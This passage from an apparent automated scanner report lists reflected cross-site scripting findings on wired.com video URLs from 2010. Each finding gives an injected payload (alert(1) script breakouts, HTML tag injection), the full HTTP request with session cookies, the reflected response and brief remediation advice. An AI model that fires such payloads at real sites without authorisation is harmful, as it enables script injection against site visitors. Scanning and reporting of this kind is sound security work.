Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=273
Expires: Mon, 22 Nov 2010 00:42:08 GMT
Date: Mon, 22 Nov 2010 00:37:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106779


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "green-lantern-theatrical-trailer","latest-videos","6802540550014a0a0"-alert(1)-"b92fb7546c6","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1162. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5536"><a>da764d97e81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod5536"><a>da764d97e81/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29423
Vary: Accept-Encoding
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:41:28 GMT
Date: Mon, 22 Nov 2010 00:36:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod5536"><a>da764d97e81 ss_latest-videos c_latest">
...[SNIP]...

1.1163. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 83275--><script>alert(1)</script>e5a9bbeecef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video83275--><script>alert(1)</script>e5a9bbeecef/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29462
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:03 GMT
Date: Mon, 22 Nov 2010 00:37:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video83275--><script>alert(1)</script>e5a9bbeecef/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001
-->
...[SNIP]...

1.1164. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d4e6"-alert(1)-"e33b8c1baf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos1d4e6"-alert(1)-"e33b8c1baf7/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:42:54 GMT
Date: Mon, 22 Nov 2010 00:38:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660659848001","latest","latest-videos1d4e6"-alert(1)-"e33b8c1baf7","1815816633","laserguided-rocket-launchers","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1165. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dcb"><a>1f630dc75e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videosd9dcb"><a>1f630dc75e0/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:10 GMT
Date: Mon, 22 Nov 2010 00:37:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videosd9dcb"><a>1f630dc75e0 c_latest">
...[SNIP]...

1.1166. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d97"><a>f80f15bc3c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestc9d97"><a>f80f15bc3c8/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:11 GMT
Date: Mon, 22 Nov 2010 00:38:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestc9d97"><a>f80f15bc3c8">
...[SNIP]...

1.1167. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94c99"-alert(1)-"457d603472f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest94c99"-alert(1)-"457d603472f/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:09 GMT
Date: Mon, 22 Nov 2010 00:39:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660659848001","latest-videos","1815816633","laserguided-rocket-launchers","latest94c99"-alert(1)-"457d603472f","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1168. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7996"-alert(1)-"f62a95a254e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633a7996"-alert(1)-"f62a95a254e/laserguided-rocket-launchers/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:44:08 GMT
Date: Mon, 22 Nov 2010 00:39:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660659848001","latest-videos","latest","laserguided-rocket-launchers","1815816633a7996"-alert(1)-"f62a95a254e","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1169. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3825b"-alert(1)-"90b48e4dfef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/laserguided-rocket-launchers3825b"-alert(1)-"90b48e4dfef/660659848001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:44:25 GMT
Date: Mon, 22 Nov 2010 00:39:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "660659848001","latest-videos","latest","1815816633","laserguided-rocket-launchers3825b"-alert(1)-"90b48e4dfef","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1170. http://www.wired.com/video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b55"-alert(1)-"8ee60d48302 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/66065984800173b55"-alert(1)-"8ee60d48302 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:42 GMT
Date: Mon, 22 Nov 2010 00:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","laserguided-rocket-launchers","66065984800173b55"-alert(1)-"8ee60d48302","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1171. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bea3f"><a>ee19a8d381a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videobea3f"><a>ee19a8d381a/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29438
Vary: Accept-Encoding
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:46:45 GMT
Date: Mon, 22 Nov 2010 00:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videobea3f"><a>ee19a8d381a ss_latest-videos c_latest">
...[SNIP]...

1.1172. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ac914--><script>alert(1)</script>70f13a29eaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoac914--><script>alert(1)</script>70f13a29eaf/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29477
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:43 GMT
Date: Mon, 22 Nov 2010 00:42:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoac914--><script>alert(1)</script>70f13a29eaf/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001
-->
...[SNIP]...

1.1173. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 113f6"-alert(1)-"9d712c2a0d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos113f6"-alert(1)-"9d712c2a0d2/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:59 GMT
Date: Mon, 22 Nov 2010 00:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos113f6"-alert(1)-"9d712c2a0d2","latest","1815816633","lockheed-shows-off-hulc-exoskeleton-at-asus","652164127001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1174. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e1e"><a>d886052180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos96e1e"><a>d886052180/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:47:22 GMT
Date: Mon, 22 Nov 2010 00:42:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos96e1e"><a>d886052180 c_latest">
...[SNIP]...

1.1175. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61f6"-alert(1)-"a4270526c2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

